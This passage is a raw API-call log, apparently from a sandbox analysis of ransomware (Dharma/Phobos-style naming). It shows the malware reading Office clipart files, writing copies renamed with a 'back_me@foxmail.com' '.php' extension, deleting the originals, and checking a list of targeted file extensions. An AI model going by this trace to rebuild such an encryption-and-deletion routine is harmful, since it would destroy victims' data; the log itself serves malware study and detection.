dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0248.124] GetLastError () returned 0x0 [0248.124] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x1815, lpOverlapped=0x0) returned 1 [0248.126] WriteFile (in: hFile=0x384, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x1820, lpOverlapped=0x0) returned 1 [0248.127] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0248.127] WriteFile (in: hFile=0x384, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xea, lpOverlapped=0x0) returned 1 [0248.127] SetEndOfFile (hFile=0x384) returned 1 [0248.127] CloseHandle (hObject=0x384) returned 1 [0248.127] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.127] SetEndOfFile (hFile=0x210) returned 1 [0248.130] CloseHandle (hObject=0x210) returned 1 [0248.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0248.130] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 1 [0248.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.130] lstrlenW (lpString=".doc") returned 4 [0248.130] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0248.130] lstrlenW (lpString=".docx") returned 5 [0248.130] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0248.130] lstrlenW (lpString=".pdf") returned 4 [0248.130] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0248.130] lstrlenW (lpString=".xls") returned 4 [0248.130] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0248.130] lstrlenW (lpString=".xlsx") returned 5 [0248.130] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0248.131] lstrlenW (lpString=".ppt") returned 4 [0248.131] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0248.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.131] lstrlenW (lpString=".zip") returned 4 [0248.131] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0248.131] lstrlenW (lpString=".rar") returned 4 [0248.131] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0248.131] lstrlenW (lpString=".bz2") returned 4 [0248.131] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0248.131] lstrlenW (lpString=".7z") returned 3 [0248.131] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0248.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.131] lstrlenW (lpString=".dbf") returned 4 [0248.131] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0248.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.131] lstrlenW (lpString=".1cd") returned 4 [0248.131] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0248.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.131] lstrlenW (lpString=".jpg") returned 4 [0248.131] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0248.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.131] lstrlenW (lpString=".doc") returned 4 [0248.131] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0248.131] lstrlenW (lpString=".docx") returned 5 [0248.131] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0248.131] lstrlenW (lpString=".pdf") returned 4 [0248.131] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0248.131] lstrlenW (lpString=".xls") returned 4 [0248.131] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0248.132] lstrlenW (lpString=".xlsx") returned 5 [0248.132] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0248.132] lstrlenW (lpString=".ppt") returned 4 [0248.132] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0248.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.132] lstrlenW (lpString=".zip") returned 4 [0248.132] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0248.132] lstrlenW (lpString=".rar") returned 4 [0248.132] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0248.132] lstrlenW (lpString=".bz2") returned 4 [0248.132] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0248.132] lstrlenW (lpString=".7z") returned 3 [0248.132] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0248.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.132] lstrlenW (lpString=".dbf") returned 4 [0248.132] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0248.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.132] lstrlenW (lpString=".1cd") returned 4 [0248.132] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0248.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0248.132] lstrlenW (lpString=".jpg") returned 4 [0248.132] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0248.132] lstrcmpiW (lpString1=".MID", lpString2=".php") returned -1 [0248.132] lstrlenW (lpString="EXPLR_01.MID") returned 12 [0248.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0248.133] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=10562) returned 1 [0248.133] CloseHandle (hObject=0x210) returned 1 [0248.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 0x20 [0248.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0248.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0248.133] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.133] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0248.133] GetLastError () returned 0x0 [0248.134] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x2942, lpOverlapped=0x0) returned 1 [0248.135] WriteFile (in: hFile=0x384, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x2950, lpOverlapped=0x0) returned 1 [0248.136] ReadFile (in: hFile=0x210, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0248.136] WriteFile (in: hFile=0x384, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0248.136] SetEndOfFile (hFile=0x384) returned 1 [0248.136] CloseHandle (hObject=0x384) returned 1 [0248.136] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.136] SetEndOfFile (hFile=0x210) returned 1 [0248.199] CloseHandle (hObject=0x210) returned 1 [0248.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0248.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 1 [0248.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.203] lstrlenW (lpString=".doc") returned 4 [0248.203] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0248.203] lstrlenW (lpString=".docx") returned 5 [0248.203] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0248.203] lstrlenW (lpString=".pdf") returned 4 [0248.203] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0248.203] lstrlenW (lpString=".xls") returned 4 [0248.203] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0248.203] lstrlenW (lpString=".xlsx") returned 5 [0248.203] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0248.203] lstrlenW (lpString=".ppt") returned 4 [0248.204] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0248.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.204] lstrlenW (lpString=".zip") returned 4 [0248.204] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0248.204] lstrlenW (lpString=".rar") returned 4 [0248.204] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0248.204] lstrlenW (lpString=".bz2") returned 4 [0248.204] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0248.204] lstrlenW (lpString=".7z") returned 3 [0248.204] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0248.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.204] lstrlenW (lpString=".dbf") returned 4 [0248.204] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0248.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.204] lstrlenW (lpString=".1cd") returned 4 [0248.204] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0248.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.204] lstrlenW (lpString=".jpg") returned 4 [0248.204] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0248.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.204] lstrlenW (lpString=".doc") returned 4 [0248.204] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0248.204] lstrlenW (lpString=".docx") returned 5 [0248.204] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0248.204] lstrlenW (lpString=".pdf") returned 4 [0248.204] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0248.204] lstrlenW (lpString=".xls") returned 4 [0248.204] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0248.204] lstrlenW (lpString=".xlsx") returned 5 [0248.205] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0248.205] lstrlenW (lpString=".ppt") returned 4 [0248.205] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0248.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.205] lstrlenW (lpString=".zip") returned 4 [0248.205] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0248.205] lstrlenW (lpString=".rar") returned 4 [0248.205] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0248.205] lstrlenW (lpString=".bz2") returned 4 [0248.205] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0248.205] lstrlenW (lpString=".7z") returned 3 [0248.205] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0248.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.205] lstrlenW (lpString=".dbf") returned 4 [0248.205] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0248.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.205] lstrlenW (lpString=".1cd") returned 4 [0248.205] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0248.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0248.205] lstrlenW (lpString=".jpg") returned 4 [0248.205] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0248.205] lstrcmpiW (lpString1=".MID", lpString2=".php") returned -1 [0248.205] lstrlenW (lpString="FINCL_01.MID") returned 12 [0248.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0248.211] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=12981) returned 1 [0248.211] CloseHandle (hObject=0x354) returned 1 [0248.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 0x20 [0248.224] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0248.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0248.283] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.283] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0248.634] GetLastError () returned 0x0 [0248.634] ReadFile (in: hFile=0x208, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x32b5, lpOverlapped=0x0) returned 1 [0248.643] WriteFile (in: hFile=0x394, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x32c0, lpOverlapped=0x0) returned 1 [0248.644] ReadFile (in: hFile=0x208, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0248.644] WriteFile (in: hFile=0x394, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0248.644] SetEndOfFile (hFile=0x394) returned 1 [0248.644] CloseHandle (hObject=0x394) returned 1 [0248.644] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.644] SetEndOfFile (hFile=0x208) returned 1 [0248.773] CloseHandle (hObject=0x208) returned 1 [0248.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0249.018] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 1 [0249.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.019] lstrlenW (lpString=".doc") returned 4 [0249.019] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.019] lstrlenW (lpString=".docx") returned 5 [0249.019] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.019] lstrlenW (lpString=".pdf") returned 4 [0249.019] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.019] lstrlenW (lpString=".xls") returned 4 [0249.019] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.019] lstrlenW (lpString=".xlsx") returned 5 [0249.019] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.019] lstrlenW (lpString=".ppt") returned 4 [0249.019] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.019] lstrlenW (lpString=".zip") returned 4 [0249.019] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.019] lstrlenW (lpString=".rar") returned 4 [0249.019] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.019] lstrlenW (lpString=".bz2") returned 4 [0249.019] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.019] lstrlenW (lpString=".7z") returned 3 [0249.019] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.019] lstrlenW (lpString=".dbf") returned 4 [0249.019] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.019] lstrlenW (lpString=".1cd") returned 4 [0249.019] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.020] lstrlenW (lpString=".jpg") returned 4 [0249.020] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.020] lstrlenW (lpString=".doc") returned 4 [0249.020] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.020] lstrlenW (lpString=".docx") returned 5 [0249.020] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.020] lstrlenW (lpString=".pdf") returned 4 [0249.020] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.020] lstrlenW (lpString=".xls") returned 4 [0249.020] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.020] lstrlenW (lpString=".xlsx") returned 5 [0249.020] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.020] lstrlenW (lpString=".ppt") returned 4 [0249.020] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.020] lstrlenW (lpString=".zip") returned 4 [0249.020] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.020] lstrlenW (lpString=".rar") returned 4 [0249.020] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.020] lstrlenW (lpString=".bz2") returned 4 [0249.020] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.020] lstrlenW (lpString=".7z") returned 3 [0249.020] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.021] lstrlenW (lpString=".dbf") returned 4 [0249.021] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.021] lstrlenW (lpString=".1cd") returned 4 [0249.021] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0249.021] lstrlenW (lpString=".jpg") returned 4 [0249.021] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.052] lstrcmpiW (lpString1=".MID", lpString2=".php") returned -1 [0249.052] lstrlenW (lpString="ROAD_01.MID") returned 11 [0249.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0249.069] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=5983) returned 1 [0249.069] CloseHandle (hObject=0x210) returned 1 [0249.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid")) returned 0x20 [0249.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0249.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0249.170] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.170] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0249.170] GetLastError () returned 0x0 [0249.170] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x175f, lpOverlapped=0x0) returned 1 [0249.172] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, 